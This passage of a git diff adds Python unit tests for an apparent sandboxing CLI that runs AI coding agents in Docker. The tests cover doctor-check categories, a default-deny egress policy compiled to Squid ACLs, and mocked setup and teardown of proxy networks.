CheckResult(name="Provider Image", passed=True, message="ok") + _assign_category(check) + assert check.category == "provider" + + def test_provider_auth_gets_provider(self) -> None: + check = CheckResult(name="Provider Auth", passed=True, message="ok") + _assign_category(check) + assert check.category == "provider" + + def test_config_directory_gets_config(self) -> None: + check = CheckResult(name="Config Directory", passed=True, message="ok") + _assign_category(check) + assert check.category == "config" + + def test_safety_policy_gets_config(self) -> None: + check = CheckResult(name="Safety Policy", passed=True, message="ok") + _assign_category(check) + assert check.category == "config" + + def test_worktree_health_gets_worktree(self) -> None: + check = CheckResult(name="Worktree Health", passed=True, message="ok") + _assign_category(check) + assert check.category == "worktree" + + def test_unknown_check_stays_general(self) -> None: + check = CheckResult(name="Custom Thing", passed=True, message="ok") + _assign_category(check) + assert check.category == "general" + + def test_preexisting_category_preserved(self) -> None: + """If the check function already set a non-default category, keep it.""" + check = CheckResult(name="Git", passed=True, message="ok", category="provider") + _assign_category(check) + assert check.category == "provider" + + def test_all_mapped_names_are_present(self) -> None: + """Ensure every mapped name resolves to a known category.""" + known_categories = {"backend", "provider", "config", "worktree", "general"} + for name, cat in _CATEGORY_MAP.items(): + assert cat in known_categories, f"{name!r} maps to unknown category {cat!r}" + + +# --------------------------------------------------------------------------- +# run_doctor threads provider_id +# --------------------------------------------------------------------------- + + +class TestRunDoctorProviderThreading: + """Verify run_doctor passes provider_id to provider checks.""" + + @patch("scc_cli.doctor.core.check_safety_policy") + @patch("scc_cli.doctor.core.check_user_config_valid") + @patch("scc_cli.doctor.core.check_config_directory") + @patch("scc_cli.doctor.core.check_wsl2") + @patch("scc_cli.doctor.core.check_provider_auth") + @patch("scc_cli.doctor.core.check_provider_image") + @patch("scc_cli.doctor.core.check_runtime_backend") + @patch("scc_cli.doctor.core.check_docker_sandbox") + @patch("scc_cli.doctor.core.check_docker_running") + @patch("scc_cli.doctor.core.check_docker") + @patch("scc_cli.doctor.core.check_git") + def test_provider_id_passed_to_image_check( + self, + mock_git: MagicMock, + mock_docker: MagicMock, + mock_docker_running: MagicMock, + mock_sandbox: MagicMock, + mock_runtime: MagicMock, + mock_image: MagicMock, + mock_auth: MagicMock, + mock_wsl2: MagicMock, + mock_config_dir: MagicMock, + mock_user_config: MagicMock, + mock_safety: MagicMock, + ) -> None: + """run_doctor(provider_id='codex') threads it to check_provider_image.""" + ok = CheckResult(name="ok", passed=True, message="ok") + mock_git.return_value = ok + mock_docker.return_value = CheckResult( + name="Docker", passed=True, message="ok", version="24.0" + ) + mock_docker_running.return_value = ok + mock_sandbox.return_value = CheckResult(name="Sandbox", passed=True, message="ok") + mock_runtime.return_value = ok + mock_image.return_value = ok + mock_auth.return_value = ok + mock_wsl2.return_value = (ok, False) + mock_config_dir.return_value = ok + mock_user_config.return_value = ok + mock_safety.return_value = ok + + run_doctor(provider_id="codex") + + mock_image.assert_called_once_with(provider_id="codex") + + @patch("scc_cli.doctor.core.check_safety_policy") + @patch("scc_cli.doctor.core.check_user_config_valid") + @patch("scc_cli.doctor.core.check_config_directory") + @patch("scc_cli.doctor.core.check_wsl2") + @patch("scc_cli.doctor.core.check_provider_auth") + @patch("scc_cli.doctor.core.check_provider_image") + @patch("scc_cli.doctor.core.check_runtime_backend") + @patch("scc_cli.doctor.core.check_docker_sandbox") + @patch("scc_cli.doctor.core.check_docker_running") + @patch("scc_cli.doctor.core.check_docker") + @patch("scc_cli.doctor.core.check_git") + def test_provider_id_passed_to_auth_check( + self, + mock_git: MagicMock, + mock_docker: MagicMock, + mock_docker_running: MagicMock, + mock_sandbox: MagicMock, + mock_runtime: MagicMock, + mock_image: MagicMock, + mock_auth: MagicMock, + mock_wsl2: MagicMock, + mock_config_dir: MagicMock, + mock_user_config: MagicMock, + mock_safety: MagicMock, + ) -> None: + """run_doctor(provider_id='codex') threads it to check_provider_auth.""" + ok = CheckResult(name="ok", passed=True, message="ok") + mock_git.return_value = ok + mock_docker.return_value = CheckResult( + name="Docker", passed=True, message="ok", version="24.0" + ) + mock_docker_running.return_value = ok + mock_sandbox.return_value = CheckResult(name="Sandbox", passed=True, message="ok") + mock_runtime.return_value = ok + mock_image.return_value = ok + mock_auth.return_value = ok + mock_wsl2.return_value = (ok, False) + mock_config_dir.return_value = ok + mock_user_config.return_value = ok + mock_safety.return_value = ok + + run_doctor(provider_id="codex") + + mock_auth.assert_called_once_with(provider_id="codex") + + @patch("scc_cli.doctor.core.check_safety_policy") + @patch("scc_cli.doctor.core.check_user_config_valid") + @patch("scc_cli.doctor.core.check_config_directory") + @patch("scc_cli.doctor.core.check_wsl2") + @patch("scc_cli.doctor.core.check_provider_auth") + @patch("scc_cli.doctor.core.check_provider_image") + @patch("scc_cli.doctor.core.check_runtime_backend") + @patch("scc_cli.doctor.core.check_docker_sandbox") + @patch("scc_cli.doctor.core.check_docker_running") + @patch("scc_cli.doctor.core.check_docker") + @patch("scc_cli.doctor.core.check_git") + def test_categories_assigned_after_run( + self, + mock_git: MagicMock, + mock_docker: MagicMock, + mock_docker_running: MagicMock, + mock_sandbox: MagicMock, + mock_runtime: MagicMock, + mock_image: MagicMock, + mock_auth: MagicMock, + mock_wsl2: MagicMock, + mock_config_dir: MagicMock, + mock_user_config: MagicMock, + mock_safety: MagicMock, + ) -> None: + """All checks have categories assigned after run_doctor completes.""" + mock_git.return_value = CheckResult(name="Git", passed=True, message="ok") + mock_docker.return_value = CheckResult( + name="Docker", passed=True, message="ok", version="24.0" + ) + mock_docker_running.return_value = CheckResult( + name="Docker Daemon", passed=True, message="ok" + ) + mock_sandbox.return_value = CheckResult(name="Sandbox Backend", passed=True, message="ok") + mock_runtime.return_value = CheckResult(name="Runtime Backend", passed=True, message="ok") + mock_image.return_value = CheckResult(name="Provider Image", passed=True, message="ok") + mock_auth.return_value = CheckResult(name="Provider Auth", passed=True, message="ok") + mock_wsl2.return_value = (CheckResult(name="WSL2", passed=True, message="ok"), False) + mock_config_dir.return_value = CheckResult( + name="Config Directory", passed=True, message="ok" + ) + mock_user_config.return_value = CheckResult(name="User Config", passed=True, message="ok") + mock_safety.return_value = CheckResult(name="Safety Policy", passed=True, message="ok") + + result = run_doctor() + + for check in result.checks: + assert check.category != "", f"Check {check.name!r} has empty category" + # Named checks should have a mapped category, not 'general' (except WSL2) + if check.name in _CATEGORY_MAP: + assert check.category == _CATEGORY_MAP[check.name] + + @patch("scc_cli.doctor.core.check_safety_policy") + @patch("scc_cli.doctor.core.check_user_config_valid") + @patch("scc_cli.doctor.core.check_config_directory") + @patch("scc_cli.doctor.core.check_wsl2") + @patch("scc_cli.doctor.core.check_provider_auth") + @patch("scc_cli.doctor.core.check_provider_image") + @patch("scc_cli.doctor.core.check_runtime_backend") + @patch("scc_cli.doctor.core.check_docker_sandbox") + @patch("scc_cli.doctor.core.check_docker_running") + @patch("scc_cli.doctor.core.check_docker") + @patch("scc_cli.doctor.core.check_git") + def test_run_doctor_without_provider_checks_both_known_providers( + self, + mock_git: MagicMock, + mock_docker: MagicMock, + mock_docker_running: MagicMock, + mock_sandbox: MagicMock, + mock_runtime: MagicMock, + mock_image: MagicMock, + mock_auth: MagicMock, + mock_wsl2: MagicMock, + mock_config_dir: MagicMock, + mock_user_config: MagicMock, + mock_safety: MagicMock, + ) -> None: + ok = CheckResult(name="ok", passed=True, message="ok") + mock_git.return_value = ok + mock_docker.return_value = CheckResult( + name="Docker", passed=True, message="ok", version="24.0" + ) + mock_docker_running.return_value = ok + mock_sandbox.return_value = ok + mock_runtime.return_value = ok + mock_image.side_effect = [ + CheckResult(name="Provider Image", passed=True, message="ok", category="provider"), + CheckResult(name="Provider Image", passed=True, message="ok", category="provider"), + ] + mock_auth.side_effect = [ + CheckResult(name="Provider Auth", passed=True, message="ok", category="provider"), + CheckResult(name="Provider Auth", passed=True, message="ok", category="provider"), + ] + mock_wsl2.return_value = (ok, False) + mock_config_dir.return_value = ok + mock_user_config.return_value = ok + mock_safety.return_value = ok + + result = run_doctor() + + assert mock_image.call_args_list[0].kwargs == {"provider_id": "claude"} + assert mock_image.call_args_list[1].kwargs == {"provider_id": "codex"} + assert mock_auth.call_args_list[0].kwargs == {"provider_id": "claude"} + assert mock_auth.call_args_list[1].kwargs == {"provider_id": "codex"} + provider_names = [check.name for check in result.checks if check.category == "provider"] + assert "Provider Image (Claude Code)" in provider_names + assert "Provider Image (Codex)" in provider_names + assert "Provider Auth (Claude Code)" in provider_names + assert "Provider Auth (Codex)" in provider_names + + +# --------------------------------------------------------------------------- +# doctor_cmd --provider validation +# --------------------------------------------------------------------------- + + +class TestDoctorCmdProviderFlag: + """Verify --provider flag validation in doctor_cmd.""" + + def test_unknown_provider_exits_with_code_2(self) -> None: + """--provider unknown_provider exits with code 2.""" + from click.exceptions import Exit as ClickExit + + from scc_cli.commands.admin import doctor_cmd + + with pytest.raises(ClickExit) as exc_info: + # Pass all params explicitly — typer defaults are OptionInfo objects + doctor_cmd( + workspace=None, + quick=False, + json_output=False, + pretty=False, + provider="unknown_provider", + ) + assert exc_info.value.exit_code == 2 + + @patch("scc_cli.commands.admin.doctor") + def test_valid_provider_passes_to_run_doctor(self, mock_doctor: MagicMock) -> None: + """--provider codex passes provider_id='codex' to run_doctor.""" + from scc_cli.commands.admin import doctor_cmd + + result = DoctorResult() + result.git_ok = True + result.docker_ok = True + result.sandbox_ok = True + result.checks = [CheckResult(name="Git", passed=True, message="ok")] + mock_doctor.run_doctor.return_value = result + mock_doctor.render_doctor_results = MagicMock() + + # Pass all params explicitly — typer defaults are OptionInfo objects + doctor_cmd( + workspace=None, + quick=False, + json_output=False, + pretty=False, + provider="codex", + ) + + mock_doctor.run_doctor.assert_called_once() + call_kwargs = mock_doctor.run_doctor.call_args + assert call_kwargs[1].get("provider_id") == "codex" or ( + len(call_kwargs[0]) >= 2 and call_kwargs[0][1] == "codex" + ) + + +# --------------------------------------------------------------------------- +# build_doctor_json_data includes category +# --------------------------------------------------------------------------- + + +class TestJsonDataCategory: + """Verify build_doctor_json_data includes category in each check dict.""" + + def test_category_present_in_json(self) -> None: + result = DoctorResult() + result.checks = [ + CheckResult(name="Git", passed=True, message="ok", category="backend"), + CheckResult(name="Provider Image", passed=True, message="ok", category="provider"), + ] + data = build_doctor_json_data(result) + for check_dict in data["checks"]: + assert "category" in check_dict + + def test_category_values_match(self) -> None: + result = DoctorResult() + result.checks = [ + CheckResult(name="Git", passed=True, message="ok", category="backend"), + CheckResult(name="Config Directory", passed=True, message="ok", category="config"), + ] + data = build_doctor_json_data(result) + assert data["checks"][0]["category"] == "backend" + assert data["checks"][1]["category"] == "config" + + +# --------------------------------------------------------------------------- +# Render grouping +# --------------------------------------------------------------------------- + + +class TestRenderGrouping: + """Verify render_doctor_results groups checks by category.""" + + def test_sort_checks_by_category_order(self) -> None: + """Checks are sorted: backend → provider → config → worktree → general.""" + checks = [ + CheckResult(name="WSL2", passed=True, message="ok", category="general"), + CheckResult(name="Provider Image", passed=True, message="ok", category="provider"), + CheckResult(name="Git", passed=True, message="ok", category="backend"), + CheckResult(name="Config Directory", passed=True, message="ok", category="config"), + CheckResult(name="Worktree Health", passed=True, message="ok", category="worktree"), + ] + sorted_checks = _sort_checks_by_category(checks) + categories = [c.category for c in sorted_checks] + assert categories == ["backend", "provider", "config", "worktree", "general"] + + def test_render_does_not_crash(self) -> None: + """render_doctor_results runs without error on a valid result.""" + result = DoctorResult() + result.git_ok = True + result.docker_ok = True + result.sandbox_ok = True + result.checks = [ + CheckResult(name="Git", passed=True, message="ok", category="backend"), + CheckResult(name="Docker", passed=True, message="ok", category="backend"), + CheckResult(name="Provider Image", passed=True, message="ok", category="provider"), + CheckResult(name="Config Directory", passed=True, message="ok", category="config"), + ] + console = Console(file=MagicMock(), width=120, force_terminal=True) + # Should not raise + render_doctor_results(console, result) + + def test_render_with_failures(self) -> None: + """render_doctor_results renders failures without crashing.""" + result = DoctorResult() + result.git_ok = False + result.docker_ok = False + result.sandbox_ok = False + result.checks = [ + CheckResult( + name="Git", + passed=False, + message="not found", + category="backend", + severity=SeverityLevel.ERROR, + ), + CheckResult( + name="Provider Image", + passed=False, + message="missing", + category="provider", + severity=SeverityLevel.WARNING, + fix_hint="Build the image", + ), + ] + console = Console(file=MagicMock(), width=120, force_terminal=True) + # Should not raise + render_doctor_results(console, result) + + def test_render_success_summary_lists_both_providers_when_unscoped(self) -> None: + result = DoctorResult() + result.git_ok = True + result.docker_ok = True + result.sandbox_ok = True + result.checks = [ + CheckResult(name="Git", passed=True, message="ok", category="backend"), + CheckResult(name="Docker", passed=True, message="ok", category="backend"), + ] + console = Console(record=True, width=120, force_terminal=True) + + render_doctor_results(console, result) + + assert "Ready to run Claude Code and Codex." in console.export_text() diff --git a/tests/test_egress_policy.py b/tests/test_egress_policy.py new file mode 100644 index 0000000..89e99c0 --- /dev/null +++ b/tests/test_egress_policy.py @@ -0,0 +1,226 @@ +"""Tests for egress plan builder and Squid ACL compiler. + +Covers all three NetworkPolicy modes, default deny rules, ACL compilation, +ordering invariants, and boundary conditions. +""" + +from __future__ import annotations + +from scc_cli.core.contracts import ( + DestinationSet, + EgressRule, + NetworkPolicyPlan, +) +from scc_cli.core.egress_policy import build_egress_plan, compile_squid_acl +from scc_cli.core.enums import NetworkPolicy + +# ═══════════════════════════════════════════════════════════════════════════════ +# build_egress_plan() — mode behavior +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestBuildEgressPlanModes: + """Plan builder produces correct plans for each NetworkPolicy mode.""" + + def test_open_mode_produces_no_rules(self) -> None: + plan = build_egress_plan(NetworkPolicy.OPEN) + + assert plan.mode is NetworkPolicy.OPEN + assert plan.egress_rules == () + assert plan.enforced_by_runtime is False + + def test_enforced_mode_has_default_deny_rules(self) -> None: + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED) + + assert plan.mode is NetworkPolicy.WEB_EGRESS_ENFORCED + assert plan.enforced_by_runtime is True + + deny_targets = {r.target for r in plan.egress_rules if not r.allow} + assert "127.0.0.0/8" in deny_targets, "loopback missing" + assert "10.0.0.0/8" in deny_targets, "private /8 missing" + assert "172.16.0.0/12" in deny_targets, "private /12 missing" + assert "192.168.0.0/16" in deny_targets, "private /16 missing" + assert "169.254.0.0/16" in deny_targets, "link-local missing" + assert "169.254.169.254" in deny_targets, "metadata endpoint missing" + + def test_locked_down_mode_has_no_rules(self) -> None: + plan = build_egress_plan(NetworkPolicy.LOCKED_DOWN_WEB) + + assert plan.mode is NetworkPolicy.LOCKED_DOWN_WEB + assert plan.enforced_by_runtime is True + assert plan.egress_rules == () + assert any("--network=none" in n for n in plan.notes) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# build_egress_plan() — rule composition +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestBuildEgressPlanRules: + """Plan builder correctly threads allow rules and destination sets.""" + + def test_enforced_mode_with_allow_rules(self) -> None: + custom = ( + EgressRule(target=".anthropic.com", allow=True, reason="provider API"), + EgressRule(target=".github.com", allow=True, reason="code host"), + ) + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED, egress_rules=custom) + + # Custom allow rules appear after the default deny set. + allow_targets = [r.target for r in plan.egress_rules if r.allow] + assert ".anthropic.com" in allow_targets + assert ".github.com" in allow_targets + + # Deny rules should still be first. + first_allow_idx = next(i for i, r in enumerate(plan.egress_rules) if r.allow) + for r in plan.egress_rules[:first_allow_idx]: + assert r.allow is False + + def test_enforced_mode_with_destination_sets(self) -> None: + ds = ( + DestinationSet( + name="claude-api", + destinations=("api.anthropic.com", "sentry.io"), + required=True, + ), + ) + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED, destination_sets=ds) + + assert plan.destination_sets == ds + assert plan.destination_sets[0].name == "claude-api" + + +# ═══════════════════════════════════════════════════════════════════════════════ +# build_egress_plan() — boundary / malformed inputs +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestBuildEgressPlanEdgeCases: + """Edge cases and malformed inputs for the plan builder.""" + + def test_empty_destination_set_tuple(self) -> None: + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED, destination_sets=()) + assert plan.destination_sets == () + + def test_egress_rule_with_empty_target(self) -> None: + custom = (EgressRule(target="", allow=True, reason="empty target"),) + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED, egress_rules=custom) + # Empty target is accepted; compile_squid_acl will treat it as dstdomain. + allow_targets = [r.target for r in plan.egress_rules if r.allow] + assert "" in allow_targets + + def test_enforced_mode_with_zero_allow_rules(self) -> None: + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED) + allow_rules = [r for r in plan.egress_rules if r.allow] + assert allow_rules == [] + # Should still have deny rules. + deny_rules = [r for r in plan.egress_rules if not r.allow] + assert len(deny_rules) >= 6 + + +# ═══════════════════════════════════════════════════════════════════════════════ +# compile_squid_acl() — ACL output +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestCompileSquidAcl: + """Squid ACL compiler produces valid, correctly-ordered output.""" + + def test_compile_acl_deny_private_cidrs(self) -> None: + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED) + acl = compile_squid_acl(plan) + + assert "dst 10.0.0.0/8" in acl + assert "dst 172.16.0.0/12" in acl + assert "dst 192.168.0.0/16" in acl + + def test_compile_acl_deny_metadata(self) -> None: + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED) + acl = compile_squid_acl(plan) + + assert "dst 169.254.169.254" in acl + + def test_compile_acl_allow_specific_hosts(self) -> None: + custom = (EgressRule(target=".anthropic.com", allow=True, reason="provider API"),) + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED, egress_rules=custom) + acl = compile_squid_acl(plan) + + assert "dstdomain .anthropic.com" in acl + + def test_compile_acl_deny_before_allow_ordering(self) -> None: + custom = (EgressRule(target=".anthropic.com", allow=True, reason="provider API"),) + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED, egress_rules=custom) + acl = compile_squid_acl(plan) + + lines = acl.strip().splitlines() + access_lines = [line for line in lines if line.startswith("http_access")] + + # Find last deny and first allow in access lines (excluding terminal). + deny_indices = [ + idx + for idx, line in enumerate(access_lines) + if "deny" in line and line != "http_access deny all" + ] + allow_indices = [idx for idx, line in enumerate(access_lines) if "allow" in line] + + if deny_indices and allow_indices: + assert max(deny_indices) < min(allow_indices), "all deny rules must precede allow rules" + + def test_compile_acl_ends_with_deny_all(self) -> None: + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED) + acl = compile_squid_acl(plan) + + non_empty = [line for line in acl.strip().splitlines() if line.strip()] + assert non_empty[-1] == "http_access deny all" + + def test_compile_acl_open_mode_permits_all(self) -> None: + plan = build_egress_plan(NetworkPolicy.OPEN) + acl = compile_squid_acl(plan) + + assert acl.strip() == "http_access allow all" + + def test_compile_acl_locked_down_produces_deny_all(self) -> None: + plan = build_egress_plan(NetworkPolicy.LOCKED_DOWN_WEB) + acl = compile_squid_acl(plan) + + assert acl.strip() == "http_access deny all" + + def test_compile_acl_loopback_denied(self) -> None: + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED) + acl = compile_squid_acl(plan) + + assert "dst 127.0.0.0/8" in acl + + def test_compile_acl_link_local_denied(self) -> None: + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED) + acl = compile_squid_acl(plan) + + assert "dst 169.254.0.0/16" in acl + + +# ═══════════════════════════════════════════════════════════════════════════════ +# compile_squid_acl() — boundary conditions +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestCompileSquidAclEdgeCases: + """Edge cases for the ACL compiler: open mode passthrough, etc.""" + + def test_open_mode_plan_through_compiler(self) -> None: + """OPEN plan passed through compile_squid_acl yields allow all.""" + plan = NetworkPolicyPlan( + mode=NetworkPolicy.OPEN, + enforced_by_runtime=False, + ) + acl = compile_squid_acl(plan) + assert acl.strip() == "http_access allow all" + + def test_enforced_plan_with_only_deny_rules(self) -> None: + """Enforced plan with zero allow rules — no allow lines before deny all.""" + plan = build_egress_plan(NetworkPolicy.WEB_EGRESS_ENFORCED) + acl = compile_squid_acl(plan) + + access_lines = [line for line in acl.strip().splitlines() if line.startswith("http_access")] + allow_lines = [line for line in access_lines if "allow" in line] + assert allow_lines == [], "no allow lines expected with zero allow rules" diff --git a/tests/test_egress_topology.py b/tests/test_egress_topology.py new file mode 100644 index 0000000..9dd0764 --- /dev/null +++ b/tests/test_egress_topology.py @@ -0,0 +1,291 @@ +"""Tests for NetworkTopologyManager — all Docker calls are mocked.""" + +from __future__ import annotations + +import subprocess +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.adapters.egress_topology import ( + _PROXY_IMAGE, + _PROXY_LABEL, + EgressTopologyInfo, + NetworkTopologyManager, +) +from scc_cli.core.errors import SandboxLaunchError + +# --------------------------------------------------------------------------- +# Fixtures +# --------------------------------------------------------------------------- + +SESSION_ID = "abc123" +NETWORK_NAME = f"scc-egress-{SESSION_ID}" +PROXY_NAME = f"scc-proxy-{SESSION_ID}" +PROXY_IP = "172.20.0.2" +ACL_CONFIG = "http_access deny all\n" + + +@pytest.fixture() +def manager() -> NetworkTopologyManager: + return NetworkTopologyManager(session_id=SESSION_ID) + + +def _ok(stdout: str = "") -> subprocess.CompletedProcess[str]: + """Return a successful CompletedProcess stub.""" + return subprocess.CompletedProcess(args=[], returncode=0, stdout=stdout, stderr="") + + +# --------------------------------------------------------------------------- +# setup() — happy path +# --------------------------------------------------------------------------- + + +class TestSetupHappyPath: + """Verify that setup() orchestrates Docker calls in the right order.""" + + @patch("scc_cli.adapters.egress_topology.subprocess.run") + def test_creates_internal_network( + self, mock_run: MagicMock, manager: NetworkTopologyManager + ) -> None: + mock_run.return_value = _ok(PROXY_IP) + manager.setup(ACL_CONFIG) + + # First call must be network create --internal + first_call = mock_run.call_args_list[0] + cmd = first_call[0][0] + assert cmd[:2] == ["docker", "network"] + assert "create" in cmd + assert "--internal" in cmd + assert NETWORK_NAME in cmd + + @patch("scc_cli.adapters.egress_topology.subprocess.run") + def test_starts_proxy_container( + self, mock_run: MagicMock, manager: NetworkTopologyManager + ) -> None: + mock_run.return_value = _ok(PROXY_IP) + manager.setup(ACL_CONFIG) + + # Second call is docker run for the proxy + second_call = mock_run.call_args_list[1] + cmd = second_call[0][0] + assert cmd[0] == "docker" + assert "run" in cmd + assert "-d" in cmd + assert PROXY_NAME in cmd + assert _PROXY_IMAGE in cmd + assert _PROXY_LABEL in cmd + + @patch("scc_cli.adapters.egress_topology.subprocess.run") + def test_connects_proxy_to_bridge( + self, mock_run: MagicMock, manager: NetworkTopologyManager + ) -> None: + mock_run.return_value = _ok(PROXY_IP) + manager.setup(ACL_CONFIG) + + # Third call connects proxy to bridge + third_call = mock_run.call_args_list[2] + cmd = third_call[0][0] + assert "network" in cmd + assert "connect" in cmd + assert "bridge" in cmd + assert PROXY_NAME in cmd + + @patch("scc_cli.adapters.egress_topology.subprocess.run") + def test_returns_topology_info( + self, mock_run: MagicMock, manager: NetworkTopologyManager + ) -> None: + mock_run.return_value = _ok(PROXY_IP) + info = manager.setup(ACL_CONFIG) + + assert isinstance(info, EgressTopologyInfo) + assert info.network_name == NETWORK_NAME + assert info.proxy_container_name == PROXY_NAME + assert info.proxy_endpoint == f"http://{PROXY_IP}:3128" + + @patch("scc_cli.adapters.egress_topology.subprocess.run") + def test_writes_acl_config_to_temp_file( + self, mock_run: MagicMock, manager: NetworkTopologyManager + ) -> None: + """The docker run command should volume-mount an ACL temp file.""" + mock_run.return_value = _ok(PROXY_IP) + manager.setup(ACL_CONFIG) + + # The run call (second) should have a -v flag with acl-rules.conf + run_call = mock_run.call_args_list[1] + cmd = run_call[0][0] + vol_args = [arg for arg in cmd if "/etc/squid/acl-rules.conf:ro" in arg] + assert len(vol_args) == 1, f"Expected volume mount with acl-rules.conf, got: {cmd}" + + +# --------------------------------------------------------------------------- +# teardown() +# --------------------------------------------------------------------------- + + +class TestTeardown: + """Verify teardown is idempotent and cleans up resources.""" + + @patch("scc_cli.adapters.egress_topology.subprocess.run") + def test_removes_proxy_and_network( + self, mock_run: MagicMock, manager: NetworkTopologyManager + ) -> None: + mock_run.return_value = _ok() + manager.teardown() + + cmds = [c[0][0] for c in mock_run.call_args_list] + # Should have docker rm -f for proxy + rm_calls = [c for c in cmds if "rm" in c and PROXY_NAME in c] + assert len(rm_calls) >= 1 + # Should have docker network rm for network + net_rm_calls = [c for c in cmds if "network" in c and "rm" in c and NETWORK_NAME in c] + assert len(net_rm_calls) >= 1 + + @patch("scc_cli.adapters.egress_topology.subprocess.run") + def test_idempotent_on_missing_resources( + self, mock_run: MagicMock, manager: NetworkTopologyManager + ) -> None: + """Teardown succeeds even when docker rm / network rm fail.""" + mock_run.side_effect = subprocess.CalledProcessError( + returncode=1, cmd="docker", stderr="No such container" + ) + # Should not raise + manager.teardown() + + +# --------------------------------------------------------------------------- +# setup() — failure modes +# --------------------------------------------------------------------------- + + +class TestSetupFailures: + """Verify correct error handling and cleanup on setup failures.""" + + @patch("scc_cli.adapters.egress_topology.subprocess.run") + def test_network_create_failure_raises( + self, mock_run: MagicMock, manager: NetworkTopologyManager + ) -> None: + mock_run.side_effect = subprocess.CalledProcessError( + returncode=1, cmd="docker", stderr="network already exists" + ) + + with pytest.raises(SandboxLaunchError): + manager.setup(ACL_CONFIG) + + @patch("scc_cli.adapters.egress_topology.subprocess.run") + def test_proxy_start_failure_triggers_cleanup( + self, mock_run: MagicMock, manager: NetworkTopologyManager + ) -> None: + """If the proxy container fails to start, teardown should still run.""" + call_count = 0 + + def side_effect(*args: object, **kwargs: object) -> subprocess.CompletedProcess[str]: + nonlocal call_count + call_count += 1 + if call_count == 1: + # network create succeeds + return _ok() + if call_count == 2: + # docker run fails + raise subprocess.CalledProcessError( + returncode=125, cmd="docker", stderr="image not found" + ) + # Remaining calls are teardown — succeed + return _ok() + + mock_run.side_effect = side_effect + + with pytest.raises(SandboxLaunchError): + manager.setup(ACL_CONFIG) + + # Teardown calls should have happened (rm -f + network rm) + cmds = [c[0][0] for c in mock_run.call_args_list] + teardown_cmds = cmds[2:] # everything after the failing docker run + rm_cmds = [c for c in teardown_cmds if "rm" in c] + assert len(rm_cmds) >= 1, f"Expected teardown calls after failure, got: {teardown_cmds}" + + @patch("scc_cli.adapters.egress_topology.subprocess.run") + def test_inspect_failure_triggers_cleanup( + self, mock_run: MagicMock, manager: NetworkTopologyManager + ) -> None: + """If docker inspect for proxy IP fails, full cleanup happens.""" + call_count = 0 + + def side_effect(*args: object, **kwargs: object) -> subprocess.CompletedProcess[str]: + nonlocal call_count + call_count += 1 + if call_count <= 3: + # network create, docker run, network connect all succeed + return _ok() + if call_count == 4: + # docker inspect fails + raise subprocess.CalledProcessError( + returncode=1, cmd="docker", stderr="no such container" + ) + # Teardown calls succeed + return _ok() + + mock_run.side_effect = side_effect + + with pytest.raises(SandboxLaunchError): + manager.setup(ACL_CONFIG) + + # Verify teardown happened + cmds = [c[0][0] for c in mock_run.call_args_list] + teardown_cmds = cmds[4:] + assert any("rm" in c for c in teardown_cmds) + + @patch("scc_cli.adapters.egress_topology.subprocess.run") + def test_empty_ip_raises_sandbox_launch_error( + self, mock_run: MagicMock, manager: NetworkTopologyManager + ) -> None: + """If docker inspect returns empty IP, setup should fail and clean up.""" + call_count = 0 + + def side_effect(*args: object, **kwargs: object) -> subprocess.CompletedProcess[str]: + nonlocal call_count + call_count += 1 + if call_count <= 3: + return _ok() + if call_count == 4: + # docker inspect returns empty IP + return _ok(stdout="") + return _ok() + + mock_run.side_effect = side_effect + + with pytest.raises(SandboxLaunchError, match="proxy internal IP"): + manager.setup(ACL_CONFIG) + + @patch("scc_cli.adapters.egress_topology.subprocess.run") + def test_timeout_on_network_create_raises( + self, mock_run: MagicMock, manager: NetworkTopologyManager + ) -> None: + mock_run.side_effect = subprocess.TimeoutExpired(cmd="docker", timeout=30) + + with pytest.raises(SandboxLaunchError, match="timed out"): + manager.setup(ACL_CONFIG) + + +# --------------------------------------------------------------------------- +# EgressTopologyInfo dataclass +# --------------------------------------------------------------------------- + + +class TestEgressTopologyInfo: + """Verify the data transfer object is frozen and holds expected fields.""" + + def test_frozen(self) -> None: + info = EgressTopologyInfo( + network_name="net", proxy_container_name="proxy", proxy_endpoint="http://1.2.3.4:3128" + ) + with pytest.raises(AttributeError): + info.network_name = "changed" # type: ignore[misc] + + def test_fields(self) -> None: + info = EgressTopologyInfo( + network_name="net", proxy_container_name="proxy", proxy_endpoint="http://1.2.3.4:3128" + ) + assert info.network_name == "net" + assert info.proxy_container_name == "proxy" + assert info.proxy_endpoint == "http://1.2.3.4:3128" diff --git a/tests/test_error_message_quality.py b/tests/test_error_message_quality.py new file mode 100644 index 0000000..d79909f --- /dev/null +++ b/tests/test_error_message_quality.py @@ -0,0 +1,610 @@ +"""Tests for error message quality — every user-facing error is actionable and truthful. + +Verifies: +- ProviderNotReadyError messages include 'scc doctor' or 'scc start' guidance +- InvalidProviderError lists valid provider names +- ProviderImageMissingError includes the build command +- Non-interactive launch failures give exact fix command +- Doctor check failures wrap Docker errors with SCC context +- ProviderNotAllowedError names the allowed providers +- SandboxLaunchError surfaces stderr +- ensure_provider_auth wraps raw exceptions with actionable guidance +""" + +from __future__ import annotations + +from unittest.mock import MagicMock + +import pytest + +from scc_cli.core.contracts import AuthReadiness +from scc_cli.core.errors import ( + ConfigError, + DockerDaemonNotRunningError, + DockerNotFoundError, + ExistingSandboxConflictError, + InvalidProviderError, + LaunchPolicyBlockedError, + ProviderImageBuildError, + ProviderImageMissingError, + ProviderNotAllowedError, + ProviderNotReadyError, + SandboxLaunchError, + SCCError, +) + +# 